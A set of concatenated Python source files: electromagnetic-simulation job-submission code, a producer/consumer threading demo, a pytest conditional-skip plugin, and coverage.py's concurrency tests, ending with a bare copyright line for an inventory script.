update_hpc_option(target_name, "NumEngines", num_tasks, False)
update_hpc_option(target_name, "ConfigName", config_name, True)
update_hpc_option(target_name, "DesignType", self.design_type, True)
if self.design_type == "Icepak":
update_hpc_option(target_name, "UseAutoSettings", self.design_type, False)
try:
self._desktop.SetRegistryFromFile(target_name)
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, config_name)
set_custom_dso = True
except:
pass
if name in self.existing_analysis_setups:
try:
self.logger.info("Solving design setup %s", name)
self.odesign.Analyze(name)
except:
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.error("Error in Solving Setup %s", name)
return False
else:
try:
self.logger.info("Solving Optimetrics")
self.ooptimetrics.SolveSetup(name)
except:
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.error("Error in Solving or Missing Setup %s", name)
return False
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.info("Design setup %s solved correctly", name)
return True
@aedt_exception_handler
def solve_in_batch(self, filename=None, machine="local", run_in_thread=False):
"""Analyze a design setup in batch mode.
.. note::
To use this function, the AEDT project must be closed.
Parameters
----------
filename : str, optional
Name of the setup. The default is ``None``, which means that the active project
is to be solved.
machine : str, optional
Name of the machine if remote. The default is ``"local"``.
run_in_thread : bool, optional
Whether the batch command is to be submitted as a thread. The default is
``False``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
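Examples
--------
Illustrative sketch; solves the active project in batch mode on the local machine.
>>> hfss.solve_in_batch()
True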
"""
if not filename:
filename = self.project_file
self.close_project()
if machine == "local":
# -Monitor option used as workaround for R2 BatchSolve not exiting properly at the end of the Batch job
options = " -ng -BatchSolve -Monitor "
else:
options = " -ng -distribute -machinelist list=" + machine + " -Batchsolve "
self.logger.info("Batch Solve Options: " + options)
if os.name == "posix":
batch_run = (
chr(34) + self.desktop_install_dir + "/ansysedt" + chr(34) + options + chr(34) + filename + chr(34)
)
else:
batch_run = (
chr(34) + self.desktop_install_dir + "/ansysedt.exe" + chr(34) + options + chr(34) + filename + chr(34)
)
"""
check for existing solution directory and delete if present so we
dont have old .asol files etc
"""
self.logger.info("Solving model in batch mode on " + machine)
self.logger.info("Batch Job command:" + batch_run)
if run_in_thread:
def thread_run():
""" """
os.system(batch_run)
x = threading.Thread(target=thread_run)
x.start()
else:
os.system(batch_run)
self.logger.info("Batch job finished.")
return True
@aedt_exception_handler
def submit_job(
self, clustername, aedt_full_exe_path=None, numnodes=1, numcores=32, wait_for_license=True, setting_file=None
):
"""Submit a job to be solved on a cluster.
Parameters
----------
clustername : str
Name of the cluster to submit the job to.
aedt_full_exe_path : str, optional
Full path to the AEDT executable file. The default is ``None``, in which
case ``"/clustername/AnsysEM/AnsysEM2x.x/Win64/ansysedt.exe"`` is used.
numnodes : int, optional
Number of nodes. The default is ``1``.
numcores : int, optional
Number of cores. The default is ``32``.
wait_for_license : bool, optional
Whether to wait for the license to be validated. The default is ``True``.
setting_file : str, optional
Name of the file to use as a template. The default value is ``None``.
Returns
-------
type
ID of the job.
References
----------
>>> oDesktop.SubmitJob
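Examples
--------
Illustrative sketch; the cluster name and sizes are placeholders.
>>> job_id = hfss.submit_job("mycluster", numnodes=2, numcores=64)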
"""
project_file = self.project_file
project_path = self.project_path
if not aedt_full_exe_path:
version = self.odesktop.GetVersion()[2:6]
if os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Win64\ansysedt.exe".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Win64\\\\ansysedt.exe".format(version)
)
elif os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Linux64\ansysedt".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Linux64\\\\ansysedt".format(version)
)
else:
self.logger.error("AEDT path does not exist. Please provide a full path.")
return False
else:
if not os.path.exists(aedt_full_exe_path):
self.logger.error("Aedt Path doesn't exists. Please provide a full path")
return False
aedt_full_exe_path = aedt_full_exe_path.replace("\\", "\\\\")
self.close_project()
path_file = os.path.dirname(__file__)
destination_reg = os.path.join(project_path, "Job_settings.areg")
if not setting_file:
setting_file = os.path.join(path_file, "..", "misc", "Job_Settings.areg")
shutil.copy(setting_file, destination_reg)
f1 = open(destination_reg, "w")
with open(setting_file) as f:
lines = f.readlines()
for line in lines:
if "\\ $begin" == line[:8]:
lin = "\\ $begin \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "\\ $end" == line[:6]:
lin = "\\ $end \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "NumCores" in line:
lin = "\\ \\ \\ \\ NumCores={}\\\n".format(numcores)
f1.write(lin)
elif "NumNodes=1" in line:
lin = "\\ \\ \\ \\ NumNodes={}\\\n".format(numnodes)
f1.write(lin)
elif "ProductPath" in line:
lin = "\\ \\ ProductPath =\\'{}\\'\\\n".format(aedt_full_exe_path)
f1.write(lin)
elif "WaitForLicense" in line:
lin = "\\ \\ WaitForLicense={}\\\n".format(str(wait_for_license).lower())
f1.write(lin)
else:
f1.write(line)
f1.close()
return self.odesktop.SubmitJob(os.path.join(project_path, "Job_settings.areg"), project_file)
|
Main.py
|
import queue
import time
from queue import Queue
from Consumer import Consumer
from Producer import Producer
from threading import Thread
if __name__ == '__main__':
workQueue = Queue()
finishQueue = Queue()
array1 = [1, 2, 3, 4]
array2 = [5, 6, 7, 8]
producerObj = Producer(array1, array2)
consumerObj = Consumer(len(array1))
producer = Thread(target = producerObj.run, args = [workQueue, finishQueue], daemon = True)
consumer = Thread(target = consumerObj.run, args = [workQueue, finishQueue], daemon = True)
producer.start()
consumer.start()
producer.join()
print('Producer finished !')
consumer.join()
print('Consumer finished !')
print('Main thread has finished !')
|
CustomSkipIf.py
|
import multiprocessing
import yaml
import pytest
import logging
import os
import sys
from abc import ABCMeta, abstractmethod
logger = logging.getLogger()
CUSTOM_SKIP_IF_DICT = 'custom_skip_if_dict'
CUSTOM_TEST_SKIP_PLATFORM_TYPE = 'dynamic_tests_skip_platform_type'
PLATFORM = 'Platform'
def pytest_collection(session):
initialize_cached_variables(session)
def initialize_cached_variables(session):
session.config.cache.set(CUSTOM_SKIP_IF_DICT, None)
session.config.cache.set(CUSTOM_TEST_SKIP_PLATFORM_TYPE, None)
def pytest_runtest_setup(item):
"""
Skip tests conditionally, based on the entries in the tests_to_be_skipped_conditionally.yaml file
"""
skip_tests_file_path = get_tests_to_be_skipped_path()
if os.path.exists(skip_tests_file_path):
skip_tests_dict = read_skip_file(item, skip_tests_file_path)
update_syspath_for_dynamic_import()
for test_prefix, skip_list_of_dicts in skip_tests_dict.items():
if test_in_skip_list(item, test_prefix):
logger.debug('Found custom skip condition: {}'.format(test_prefix))
make_skip_decision(skip_list_of_dicts, item)
def get_tests_to_be_skipped_path(skip_tests_file='tests_to_be_skipped_conditionally.yaml'):
"""
Get path to file with dynamic skip information
:param skip_tests_file: skip test file name
:return: full path to skip test file name
"""
custom_skip_folder_path = os.path.dirname(__file__)
custom_skip_tests_file_path = os.path.join(custom_skip_folder_path, skip_tests_file)
return custom_skip_tests_file_path
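# Illustrative (hypothetical) layout of tests_to_be_skipped_conditionally.yaml:
#
#   platform/test_reboot.py:
#     - Platform: ['simx']              # single checker in an entry -> OR logic
#     - Platform: ['armhf']             # several checkers in one entry -> AND logic
#       Jira: ['PROJ-1234']
#
# Top-level keys are test nodeid prefixes; each list entry maps checker module
# names (e.g. Platform) to the arguments handed to that module's SkipIf class.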
def read_skip_file(item, skip_tests_file_path):
"""
Read yaml file with list of test cases which should be skipped
:param item: pytest test item
:param skip_tests_file_path: path to file where stored list of test cases which should be skipped
:return: yaml loaded dictionary
"""
skip_dictionary = item.session.config.cache.get(CUSTOM_SKIP_IF_DICT, None)
if not skip_dictionary:
with open(skip_tests_file_path) as skip_data:
logger.debug('Reading dynamic skip file: {}'.format(skip_tests_file_path))
skip_dictionary = yaml.load(skip_data, Loader=yaml.FullLoader)
item.session.config.cache.set(CUSTOM_SKIP_IF_DICT, skip_dictionary)
return skip_dictionary
def update_syspath_for_dynamic_import():
"""
Update sys.path by current folder to have possibility to load python modules dynamically
"""
if os.path.dirname(__file__) not in sys.path:
sys.path.append(os.path.dirname(__file__))
def test_in_skip_list(item, test_prefix):
"""
Check if current test in skip list
:param item: pytest test item
:param test_prefix: test prefix from ignore yaml file
:return: True/False
"""
return str(item.nodeid).startswith(test_prefix)
def make_skip_decision(skip_list_of_dicts, item):
"""
Make a final decision about whether to skip the test by combining the results of all the skip statements.
:param skip_list_of_dicts: list with data which we read from ignore yaml file
:param item: pytest test item
:return: None, or calls ``pytest.skip`` when the test has to be skipped
"""
skip_result_list = []
skip_reason_str = ''
for skip_dict_entry in skip_list_of_dicts:
if is_nested_dict(skip_dict_entry):
skip_reason_str = update_skip_results(skip_dict_entry, item, 'and', skip_result_list, skip_reason_str)
else:
skip_reason_str = update_skip_results(skip_dict_entry, item, 'or', skip_result_list, skip_reason_str)
# Make final decision
if any(skip_result_list):
pytest.skip(skip_reason_str)
def is_nested_dict(dict_obj):
nested_dict_min_len = 2
return len(dict_obj) >= nested_dict_min_len
def update_skip_results(skip_dict, item, operand, skip_result_list, skip_reason_str):
"""
Get results from skip checkers and update skip_result_list and skip_reason_str
:param skip_dict: dictionary with data which we read from ignore yaml file
:param item: pytest test item
:param operand: operand applied between the individual skip checks; can be "or" or "and"
:param skip_result_list: list which we update according to checkers results
:param skip_reason_str: skip reason string which we update according to checkers results
:return: skip_reason_str - string which contains skip reason
"""
skip_required, skip_reason = get_checkers_result(skip_dict, item, operand)
skip_result_list.append(skip_required)
skip_reason_str += skip_reason
return skip_reason_str
def get_checkers_result(skip_dict, item, operand='or'):
"""
Get results about whether to skip the test by combining the results of all the skip statements.
:param skip_dict: dictionary with skip test case skip conditions
:param item: pytest test item
:param operand: operand used to combine the individual checker results ("or" / "and")
:return: True/False and string with skip reason
"""
skip_reason = ''
checkers_result = []
skip_checkers_list = prepare_checkers(skip_dict, item)
skip_dict_result = run_checkers_in_parallel(skip_checkers_list)
for checker, checker_result in skip_dict_result.items():
if checker_result:
skip_reason += '\nTest skipped due to {}: {}'.format(checker, checker_result)
checkers_result.append(True)
else:
checkers_result.append(False)
if operand == 'or':
skip_required = any(checkers_result)
else:
skip_required = all(checkers_result)
if not skip_required:
skip_reason = ''
return skip_required, skip_reason
def prepare_checkers(skip_dict, pytest_item_obj):
"""
Import dynamically checker modules and initialize them
:param skip_dict: dictionary with skip test case skip conditions
:param pytest_item_obj: pytest test item
:return: list with checkers objects
"""
skip_checkers_list = []
for skip_by in skip_dict:
logger.debug('Importing dynamic skip module: {}'.format(skip_by))
try:
skip_module_obj = __import__(skip_by).SkipIf(skip_dict[skip_by], pytest_item_obj)
skip_checkers_list.append(skip_module_obj)
except Exception as err:
logger.error('Unable to load dynamically skip object: {}'.format(err))
return skip_checkers_list
def run_checkers_in_parallel(skip_checkers_list):
"""
Run checkers in parallel and return results
:param skip_checkers_list: list with checkers objects
:return: dictionary with checkers result
"""
manager = multiprocessing.Manager()
skip_dict_result = manager.dict()
proc_list = list()
for skip_check in skip_checkers_list:
skip_dict_result[skip_check.name] = None
proc_list.append(multiprocessing.Process(target=skip_check.is_skip_required, args=(skip_dict_result,)))
for proc in proc_list:
proc.start()
for proc in proc_list:
proc.join(timeout=60)
return skip_dict_result
class CustomSkipIf:
__metaclass__ = ABCMeta
def __init__(self, ignore_list, pytest_item_obj):
# self.name = 'CustomSkipIf' # Example: Platform, Jira, Redmine - should be defined in each child class
self.ignore_list = ignore_list
self.pytest_item_obj = pytest_item_obj
@abstractmethod
def is_skip_required(self, skip_dict_result):
"""
Decide whether or not to skip a test
:param skip_dict_result: shared dictionary with data about skip test
:return: updated skip_dict
"""
return skip_dict_result
|
test_concurrency.py
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for concurrency libraries."""
import glob
import os
import random
import re
import sys
import threading
import time
from flaky import flaky
import pytest
import coverage
from coverage import env
from coverage.data import line_counts
from coverage.exceptions import ConfigError
from coverage.files import abs_file
from coverage.misc import import_local_file
from tests.coveragetest import CoverageTest
# These libraries aren't always available, we'll skip tests if they aren't.
try:
import multiprocessing
except ImportError: # pragma: only jython
multiprocessing = None
try:
import eventlet
except ImportError:
eventlet = None
try:
import gevent
except ImportError:
gevent = None
try:
import greenlet
except ImportError: # pragma: only jython
greenlet = None
def measurable_line(l):
"""Is this a line of code coverage will measure?
Not blank, not a comment, and not "else"
"""
l = l.strip()
if not l:
return False
if l.startswith('#'):
return False
if l.startswith('else:'):
return False
if env.JYTHON and l.startswith(('try:', 'except:', 'except ', 'break', 'with ')):
# Jython doesn't measure these statements.
return False # pragma: only jython
return True
def line_count(s):
"""How many measurable lines are in `s`?"""
return len(list(filter(measurable_line, s.splitlines())))
def print_simple_annotation(code, linenos):
"""Print the lines in `code` with X for each line number in `linenos`."""
for lineno, line in enumerate(code.splitlines(), start=1):
print(" {} {}".format("X" if lineno in linenos else " ", line))
class LineCountTest(CoverageTest):
"""Test the helpers here."""
run_in_temp_dir = False
def test_line_count(self):
CODE = """
# Hey there!
x = 1
if x:
print("hello")
else:
print("bye")
print("done")
"""
assert line_count(CODE) == 5
# The code common to all the concurrency models.
SUM_RANGE_Q = """
# Above this will be imports defining queue and threading.
class Producer(threading.Thread):
def __init__(self, limit, q):
threading.Thread.__init__(self)
self.limit = limit
self.q = q
def run(self):
for i in range(self.limit):
self.q.put(i)
self.q.put(None)
class Consumer(threading.Thread):
def __init__(self, q, qresult):
threading.Thread.__init__(self)
self.q = q
self.qresult = qresult
def run(self):
sum = 0
while "no peephole".upper():
i = self.q.get()
if i is None:
break
sum += i
self.qresult.put(sum)
def sum_range(limit):
q = queue.Queue()
qresult = queue.Queue()
c = Consumer(q, qresult)
p = Producer(limit, q)
c.start()
p.start()
p.join()
c.join()
return qresult.get()
# Below this will be something using sum_range.
"""
PRINT_SUM_RANGE = """
print(sum_range({QLIMIT}))
"""
# Import the things to use threads.
THREAD = """
import threading
import queue
"""
# Import the things to use eventlet.
EVENTLET = """
import eventlet.green.threading as threading
import eventlet.queue as queue
"""
# Import the things to use gevent.
GEVENT = """
from gevent import monkey
monkey.patch_thread()
import threading
import gevent.queue as queue
"""
# Uncomplicated code that doesn't use any of the concurrency stuff, to test
# the simple case under each of the regimes.
SIMPLE = """
total = 0
for i in range({QLIMIT}):
total += i
print(total)
"""
def cant_trace_msg(concurrency, the_module):
"""What might coverage.py say about a concurrency setting and imported module?"""
# In the concurrency choices, "multiprocessing" doesn't count, so remove it.
if "multiprocessing" in concurrency:
parts = concurrency.split(",")
parts.remove("multiprocessing")
concurrency = ",".join(parts)
if the_module is None:
# We don't even have the underlying module installed, we expect
# coverage to alert us to this fact.
expected_out = (
f"Couldn't trace with concurrency={concurrency}, the module isn't installed.\n"
)
elif env.C_TRACER or concurrency == "thread" or concurrency == "":
expected_out = None
else:
expected_out = (
f"Can't support concurrency={concurrency} with PyTracer, only threads are supported.\n"
)
return expected_out
class ConcurrencyTest(CoverageTest):
"""Tests of the concurrency support in coverage.py."""
QLIMIT = 1000
def try_some_code(self, code, concurrency, the_module, expected_out=None):
"""Run some concurrency testing code and see that it was all covered.
`code` is the Python code to execute. `concurrency` is the name of
the concurrency regime to test it under. `the_module` is the imported
module that must be available for this to work at all. `expected_out`
is the text we expect the code to produce.
"""
self.make_file("try_it.py", code)
cmd = f"coverage run --concurrency={concurrency} try_it.py"
out = self.run_command(cmd)
expected_cant_trace = cant_trace_msg(concurrency, the_module)
if expected_cant_trace is not None:
assert out == expected_cant_trace
pytest.skip(f"Can't test: {expected_cant_trace}")
else:
# We can fully measure the code if we are using the C tracer, which
# can support all the concurrency, or if we are using threads.
if expected_out is None:
expected_out = "%d\n" % (sum(range(self.QLIMIT)))
print(code)
assert out == expected_out
# Read the coverage file and see that try_it.py has all its lines
# executed.
data = coverage.CoverageData(".coverage")
data.read()
# If the test fails, it's helpful to see this info:
fname = abs_file("try_it.py")
linenos = data.lines(fname)
print(f"{len(linenos)}: {linenos}")
print_simple_annotation(code, linenos)
lines = line_count(code)
assert line_counts(data)['try_it.py'] == lines
def test_threads(self):
code = (THREAD + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "thread", threading)
def test_threads_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "thread", threading)
def test_eventlet(self):
code = (EVENTLET + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "eventlet", eventlet)
def test_eventlet_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "eventlet", eventlet)
# https://github.com/nedbat/coveragepy/issues/663
@pytest.mark.skipif(env.WINDOWS, reason="gevent has problems on Windows: #663")
def test_gevent(self):
code = (GEVENT + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "gevent", gevent)
def test_gevent_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "gevent", gevent)
def test_greenlet(self):
GREENLET = """\
from greenlet import greenlet
def test1(x, y):
z = gr2.switch(x+y)
print(z)
def test2(u):
print(u)
gr1.switch(42)
gr1 = greenlet(test1)
gr2 = greenlet(test2)
gr1.switch("hello", " world")
"""
self.try_some_code(GREENLET, "greenlet", greenlet, "hello world\n42\n")
def test_greenlet_simple_code(self):
code = SIMPLE.format(QLIMIT=self.QLIMIT)
self.try_some_code(code, "greenlet", greenlet)
def test_bug_330(self):
BUG_330 = """\
from weakref import WeakKeyDictionary
import eventlet
def do():
eventlet.sleep(.01)
gts = WeakKeyDictionary()
for _ in range(100):
gts[eventlet.spawn(do)] = True
eventlet.sleep(.005)
eventlet.sleep(.1)
print(len(gts))
"""
self.try_some_code(BUG_330, "eventlet", eventlet, "0\n")
def test_threads_with_gevent(self):
self.make_file("both.py", """\
import queue
import threading
import gevent
def work1(q):
q.put(1)
def gwork(q):
gevent.spawn(work1, q).join()
q.put(None)
print("done")
q = queue.Queue()
t = threading.Thread(target=gwork, args=(q,))
t.start()
t.join()
answer = q.get()
assert answer == 1
""")
out = self.run_command("coverage run --concurrency=thread,gevent both.py")
if gevent is None:
assert out == (
"Couldn't trace with concurrency=gevent, the module isn't installed.\n"
)
pytest.skip("Can't run test without gevent installed.")
if not env.C_TRACER:
assert out == (
"Can't support concurrency=gevent with PyTracer, only threads are supported.\n"
)
pytest.skip("Can't run gevent with PyTracer")
assert out == "done\n"
out = self.run_command("coverage report -m")
last_line = self.squeezed_lines(out)[-1]
assert re.search(r"TOTAL \d+ 0 100%", last_line)
def test_bad_concurrency(self):
with pytest.raises(ConfigError, match="Unknown concurrency choices: nothing"):
self.command_line("run --concurrency=nothing prog.py")
def test_bad_concurrency_in_config(self):
self.make_file(".coveragerc", "[run]\nconcurrency = nothing\n")
with pytest.raises(ConfigError, match="Unknown concurrency choices: nothing"):
self.command_line("run prog.py")
def test_no_multiple_light_concurrency(self):
with pytest.raises(ConfigError, match="Conflicting concurrency settings: eventlet, gevent"):
self.command_line("run --concurrency=gevent,eventlet prog.py")
def test_no_multiple_light_concurrency_in_config(self):
self.make_file(".coveragerc", "[run]\nconcurrency = gevent, eventlet\n")
with pytest.raises(ConfigError, match="Conflicting concurrency settings: eventlet, gevent"):
self.command_line("run prog.py")
def test_multiprocessing_needs_config_file(self):
with pytest.raises(ConfigError, match="multiprocessing requires a configuration file"):
self.command_line("run --concurrency=multiprocessing prog.py")
class WithoutConcurrencyModuleTest(CoverageTest):
"""Tests of what happens if the requested concurrency isn't installed."""
@pytest.mark.parametrize("module", ["eventlet", "gevent", "greenlet"])
def test_missing_module(self, module):
self.make_file("prog.py", "a = 1")
sys.modules[module] = None
msg = f"Couldn't trace with concurrency={module}, the module isn't installed."
with pytest.raises(ConfigError, match=msg):
self.command_line(f"run --concurrency={module} prog.py")
SQUARE_OR_CUBE_WORK = """
def work(x):
# Use different lines in different subprocesses.
if x % 2:
y = x*x
else:
y = x*x*x
return y
"""
SUM_RANGE_WORK = """
def work(x):
return sum_range((x+1)*100)
"""
MULTI_CODE = """
# Above this will be a definition of work().
import multiprocessing
import os
import time
import sys
def process_worker_main(args):
# Need to pause, or the tasks go too quickly, and some processes
# in the pool don't get any work, and then don't record data.
ret = work(*args)
time.sleep(0.1)
return os.getpid(), ret
if __name__ == "__main__": # pragma: no branch
# This if is on a single line so we can get 100% coverage
# even if we have no arguments.
if len(sys.argv) > 1: multiprocessing.set_start_method(sys.argv[1])
pool = multiprocessing.Pool({NPROCS})
inputs = [(x,) for x in range({UPTO})]
outputs = pool.imap_unordered(process_worker_main, inputs)
pids = set()
total = 0
for pid, sq in outputs:
pids.add(pid)
total += sq
print("%d pids, total = %d" % (len(pids), total))
pool.close()
pool.join()
"""
@pytest.fixture(params=["fork", "spawn"], name="start_method")
def start_method_fixture(request):
"""Parameterized fixture to choose the start_method for multiprocessing."""
start_method = request.param
if start_method not in multiprocessing.get_all_start_methods():
# Windows doesn't support "fork".
pytest.skip(f"start_method={start_method} not supported here")
return start_method
@pytest.mark.skipif(not multiprocessing, reason="No multiprocessing in this Python")
@flaky(max_runs=30) # Sometimes a test fails due to inherent randomness. Try more times.
class MultiprocessingTest(CoverageTest):
"""Test support of the multiprocessing module."""
def try_multiprocessing_code(
self,
code,
expected_out,
the_module,
nprocs,
start_method,
concurrency="multiprocessing",
args="",
):
"""Run code using multiprocessing, it should produce `expected_out`."""
self.make_file("multi.py", code)
self.make_file(".coveragerc", f"""\
[run]
concurrency = {concurrency}
source = .
""")
cmd = "coverage run {args} multi.py {start_method}".format(
args=args, start_method=start_method,
)
out = self.run_command(cmd)
expected_cant_trace = cant_trace_msg(concurrency, the_module)
if expected_cant_trace is not None:
print(out)
assert out == expected_cant_trace
pytest.skip(f"Can't test: {expected_cant_trace}")
else:
assert out.rstrip() == expected_out
assert len(glob.glob(".coverage.*")) == nprocs + 1
out = self.run_command("coverage combine")
out_lines = out.splitlines()
assert len(out_lines) == nprocs + 1
assert all(
re.fullmatch(r"Combined data file \.coverage\..*\.\d+\.\d+", line)
for line in out_lines
)
out = self.run_command("coverage report -m")
last_line = self.squeezed_lines(out)[-1]
assert re.search(r"TOTAL \d+ 0 100%", last_line)
@pytest.mark.skipif(
((3, 11, 0, "alpha", 4, 0) == env.PYVERSION),
#((3, 11, 0, "alpha", 4, 0) == env.PYVERSION) and not env.C_TRACER and env.METACOV,
reason="avoid a 3.11 bug: https://bugs.python.org/issue46389",
)
def test_multiprocessing_simple(self, start_method):
nprocs = 3
upto = 30
code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
total = sum(x*x if x%2 else x*x*x for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code(
code,
expected_out,
threading,
nprocs,
start_method=start_method,
)
@pytest.mark.skipif(
((3, 11, 0, "alpha", 4, 0) == env.PYVERSION),
#((3, 11, 0, "alpha", 4, 0) == env.PYVERSION) and not env.C_TRACER and env.METACOV,
reason="avoid a 3.11 bug: https://bugs.python.org/issue46389",
)
def test_multiprocessing_append(self, start_method):
nprocs = 3
upto = 30
code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
total = sum(x*x if x%2 else x*x*x for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code(
code,
expected_out,
threading,
nprocs,
args="--append",
start_method=start_method,
)
def test_multiprocessing_and_gevent(self, start_method):
nprocs = 3
upto = 30
code = (
SUM_RANGE_WORK + EVENTLET + SUM_RANGE_Q + MULTI_CODE
).format(NPROCS=nprocs, UPTO=upto)
total = sum(sum(range((x + 1) * 100)) for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.try_multiprocessing_code(
code,
expected_out,
eventlet,
nprocs,
concurrency="multiprocessing,eventlet",
start_method=start_method,
)
def test_multiprocessing_with_branching(self, start_method):
nprocs = 3
upto = 30
code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
total = sum(x*x if x%2 else x*x*x for x in range(upto))
expected_out = f"{nprocs} pids, total = {total}"
self.make_file("multi.py", code)
self.make_file("multi.rc", """\
[run]
concurrency = multiprocessing
branch = True
omit = */site-packages/*
""")
out = self.run_command(f"coverage run --rcfile=multi.rc multi.py {start_method}")
assert out.rstrip() == expected_out
out = self.run_command("coverage combine -q") # sneak in a test of -q
assert out == ""
out = self.run_command("coverage report -m")
last_line = self.squeezed_lines(out)[-1]
assert re.search(r"TOTAL \d+ 0 \d+ 0 100%", last_line)
def test_multiprocessing_bootstrap_error_handling(self):
# An exception during bootstrapping will be reported.
self.make_file("multi.py", """\
import multiprocessing
if __name__ == "__main__":
with multiprocessing.Manager():
pass
""")
self.make_file(".coveragerc", """\
[run]
concurrency = multiprocessing
_crash = _bootstrap
""")
out = self.run_command("coverage run multi.py")
assert "Exception during multiprocessing bootstrap init" in out
assert "Exception: Crashing because called by _bootstrap" in out
def test_bug_890(self):
# chdir in multiprocessing shouldn't keep us from finding the
# .coveragerc file.
self.make_file("multi.py", """\
import multiprocessing, os, os.path
if __name__ == "__main__":
if not os.path.exists("./tmp"): os.mkdir("./tmp")
os.chdir("./tmp")
with multiprocessing.Manager():
pass
print("ok")
""")
self.make_file(".coveragerc", """\
[run]
concurrency = multiprocessing
""")
out = self.run_command("coverage run multi.py")
assert out.splitlines()[-1] == "ok"
def test_coverage_stop_in_threads():
has_started_coverage = []
has_stopped_coverage = []
def run_thread(): # pragma: nested
"""Check that coverage is stopping properly in threads."""
deadline = time.time() + 5
ident = threading.current_thread().ident
if sys.gettrace() is not None:
has_started_coverage.append(ident)
while sys.gettrace() is not None:
# Wait for coverage to stop
time.sleep(0.01)
if time.time() > deadline:
return
has_stopped_coverage.append(ident)
cov = coverage.Coverage()
cov.start()
t = threading.Thread(target=run_thread) # pragma: nested
t.start() # pragma: nested
time.sleep(0.1) # pragma: nested
cov.stop() # pragma: nested
t.join()
assert has_started_coverage == [t.ident]
assert has_stopped_coverage == [t.ident]
def test_thread_safe_save_data(tmpdir):
# Non-regression test for: https://github.com/nedbat/coveragepy/issues/581
# Create some Python modules and put them in the path
modules_dir = tmpdir.mkdir('test_modules')
module_names = [f"m{i:03d}" for i in range(1000)]
for module_name in module_names:
modules_dir.join(module_name + ".py").write("def f(): pass\n")
# Shared variables for threads
should_run = [True]
imported = []
old_dir = os.getcwd()
os.chdir(modules_dir.strpath)
try:
# Make sure that all dummy modules can be imported.
for module_name in module_names:
import_local_file(module_name)
def random_load(): # pragma: nested
"""Import modules randomly to stress coverage."""
while should_run[0]:
module_name = random.choice(module_names)
mod = import_local_file(module_name)
mod.f()
imported.append(mod)
# Spawn some threads with coverage enabled and attempt to read the
# results right after stopping coverage collection with the threads
# still running.
duration = 0.01
for _ in range(3):
cov = coverage.Coverage()
cov.start()
threads = [threading.Thread(target=random_load) for _ in range(10)] # pragma: nested
should_run[0] = True # pragma: nested
for t in threads: # pragma: nested
t.start()
time.sleep(duration) # pragma: nested
cov.stop() # pragma: nested
# The following call used to crash with running background threads.
cov.get_data()
# Stop the threads
should_run[0] = False
for t in threads:
t.join()
if (not imported) and duration < 10: # pragma: only failure
duration *= 2
finally:
os.chdir(old_dir)
should_run[0] = False
@pytest.mark.skipif(env.WINDOWS, reason="SIGTERM doesn't work the same on Windows")
@flaky(max_runs=3) # Sometimes a test fails due to inherent randomness. Try more times.
class SigtermTest(CoverageTest):
"""Tests of our handling of SIGTERM."""
def test_sigterm_saves_data(self):
# A terminated process should save its coverage data.
self.make_file("clobbered.py", """\
import multiprocessing
import time
def subproc(x):
if x.value == 3:
print("THREE", flush=True) # line 6, missed
else:
print("NOT THREE", flush=True)
x.value = 0
time.sleep(60)
if __name__ == "__main__":
print("START", flush=True)
x = multiprocessing.Value("L", 1)
proc = multiprocessing.Process(target=subproc, args=(x,))
proc.start()
while x.value != 0:
time.sleep(.05)
proc.terminate()
print("END", flush=True)
""")
self.make_file(".coveragerc", """\
[run]
parallel = True
concurrency = multiprocessing
""")
out = self.run_command("coverage run clobbered.py")
# Under the Python tracer on Linux, we get the "Trace function changed"
# message. Does that matter?
if "Trace function changed" in out:
lines = out.splitlines(True)
assert len(lines) == 5 # "trace function changed" and "self.warn("
out = "".join(lines[:3])
assert out == "START\nNOT THREE\nEND\n"
self.run_command("coverage combine")
out = self.run_command("coverage report -m")
assert self.squeezed_lines(out)[2] == "clobbered.py 17 1 94% 6"
def test_sigterm_still_runs(self):
# A terminated process still runs its own SIGTERM handler.
self.make_file("handler.py", """\
import multiprocessing
import signal
import time
def subproc(x):
print("START", flush=True)
def on_sigterm(signum, frame):
print("SIGTERM", flush=True)
signal.signal(signal.SIGTERM, on_sigterm)
x.value = 0
time.sleep(.1)
print("END", flush=True)
if __name__ == "__main__":
x = multiprocessing.Value("L", 1)
proc = multiprocessing.Process(target=subproc, args=(x,))
proc.start()
while x.value != 0:
time.sleep(.02)
proc.terminate()
""")
self.make_file(".coveragerc", """\
[run]
parallel = True
concurrency = multiprocessing
""")
out = self.run_command("coverage run handler.py")
assert out == "START\nSIGTERM\nEND\n"
|
nb_inventory.py
|
# Copyright (c) 2018 Remy Leone
